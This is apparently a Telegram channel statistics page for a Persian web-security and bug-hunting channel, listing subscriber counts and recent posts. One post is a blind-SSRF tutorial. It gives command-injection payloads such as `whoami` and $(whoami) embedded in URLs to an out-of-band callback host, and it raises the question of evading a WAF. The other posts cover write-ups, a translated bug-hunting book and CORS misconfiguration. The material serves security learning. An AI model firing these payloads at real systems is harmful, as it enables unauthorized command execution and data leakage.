🕸 Articles
Відкрити в Telegram
416
Підписники
Немає даних24 години
+127 днів
+7730 день
Триває завантаження даних...
Схожі канали
Немає даних
Виникли проблеми? Будь ласка, оновіть сторінку або зверніться до нашого support-менеджера.
Хмара тегів
Вхідні та вихідні згадування
---
---
---
---
---
---
Залучення підписників
травень '25
травень '25
+83
в 1 каналах
квітень '25
+347
в 3 каналах
| Дата | Залучення підписників | Згадування | Канали | |
| 30 травня | 0 | |||
| 29 травня | +1 | |||
| 28 травня | +2 | |||
| 27 травня | +1 | |||
| 26 травня | +1 | |||
| 25 травня | +6 | |||
| 24 травня | +1 | |||
| 23 травня | 0 | |||
| 22 травня | +1 | |||
| 21 травня | 0 | |||
| 20 травня | +2 | |||
| 19 травня | +1 | |||
| 18 травня | 0 | |||
| 17 травня | +3 | |||
| 16 травня | +3 | |||
| 15 травня | +1 | |||
| 14 травня | +4 | |||
| 13 травня | +4 | |||
| 12 травня | +10 | |||
| 11 травня | +1 | |||
| 10 травня | 0 | |||
| 09 травня | +2 | |||
| 08 травня | +2 | |||
| 07 травня | 0 | |||
| 06 травня | +6 | |||
| 05 травня | +7 | |||
| 04 травня | +12 | |||
| 03 травня | +3 | |||
| 02 травня | +5 | |||
| 01 травня | +4 |
Дописи каналу
توی تست های blind ssrf شما جواب رو به صورت مستقیم نمیتونید ببینید باید از یه سرویس out of band کمک بگیرید تا بفهمید آیا سرور درخواست شما رو اجرا کرده یا نه.
برای دریافت پاسخ های out of band میتونید از
https://app.interactsh.comاستفاده کنید. این سه تا دستور رو توی تست های blind ssrf بیارید. میتونید باهاش دستورات سیستم عاملی اجرا کنید. Text Payloads:
`whoami`
$(whoami)
${USER}
در نهایت باید پیلودتون شبیه به این باشه
Text Payloads:
https://`whoami`.wovpawxjsgngqywkn[.]oast[.]fun
https://$(whoami).wovpawxjsgngqywkn.oast.fun
https://${USER}.wovpawxjsgngqywkn.oast.fun
کافیه این آدرس رو توی هر ورودی که مشکوک به ssrf هست بزنید و منتظر باشید در صورت آسیب پذیر بودن پاسخ توی داشبورد interactsh نمایش داده بشه
حالا یه سوال اگر waf به کلمه whoami یا کاراکتر هایی که داره باهاش ارسال میشه حساس باشه و درخواست رو بلاک کنه راهی برای دور زدنش هست؟| 2 | چرا باید رایتاپ بخونیم؟
خوندن ۵۰ تا رایتاپ مثل اینه که ۵۰ هکر حرفهای رو دعوت کنی کنار دستت بشینن و هر کدوم ذهنشون رو جلوت باز کنن. با هر رایتاپ، یه تیکه از درک و تجربهشون رو برمیداری و به روش خودت اضافه میکنی. نتیجه؟ چشمای تربیتشدهای که جزئیاتی رو میبینه که قبلاً هرگز به چشم نمیاومد و این دقیقاً همون چیزیه که یه باگهانتر حرفهای رو از بقیه جدا میکنه. | 341 |
| 3 | بعدی چی باشه؟ | 348 |
| 4 | Author: zarvan
Language: Persian
Telegram channel: @web_articles | 412 |
| 5 | Немає тексту... | 375 |
| 6 | آخ یه نفر لفت داد | 353 |
| 7 | آخ یه نفر لفت داد | 1 |
| 8 | Немає тексту... | 368 |
| 9 | Author: zarvan
Language: Persian
Telegram channel: @web_articles | 688 |
| 10 | برش هایی از کتاب | 526 |
| 11 | درود امیدوارم حالتون خوب باشه
همونطور که میدونید یکی از کتاب هایی که توی رودمپ یاد گیری وب هکینگ هست مخصوصا توصیه شده برای هانترها کتاب Real-World Bug Hunting _ Peter Yaworski هست. بعد از مدتی این کتاب رو بلاخره آماده کردم میخواستم چاپش کنم ولی خب بنا به دلایلی نشد که علتش رو هم توی کتاب توضیح دادم.
امیدوارم این کتاب مفید باشه براتون. | 455 |
| 12 | 10. Miane Ghamhayam (Ft. Fadaei).mp3 | 436 |
| 13 | Author: zarvan
Language: Persian
Telegram channel: @web_articles | 605 |
| 14 | Немає тексту... | 536 |
| 15 | Немає тексту... | 427 |
| 16 | سلام بچه ها امیدوارم حالتون خوب باشه
مفاهیم اولیه امنیت وب به نظرتون شامل چه چیزایی میشه؟
ممنون میشم همین زیر هر چیزی که فکر میکنید یه نفر باید برای یادگیری امنیت وب اپلیکیشن ها بلد باشه بهم بگین.
به عنوان مثال:
اینترنت چیه و چجوری کار میکنه؟
وب چطوری کار میکنه؟
Request/Response چیه؟
Cookie, Session, Storage چطور کار میکنن؟
مرورگر چطور رندر میکنه صفحات رو؟ | 506 |
| 17 | Author: zarvan
Language: Persian
Telegram channel: @web_articles | 2 105 |
| 18 | خب coming soon کافیه دیگه
سومین آسیب پذیری که بهش پرداختم CORS Misconfigoration هست.
اول از همه گفتیم cors چیه؟
چطوری کار میکنه؟
چطوری پیاده سازی میشه؟
و در نهایت چه آسیب پذیری هایی داره | 633 |
| 19 | coming soon... | 578 |
| 20 | https://t.me/GitBook_s | 165 |
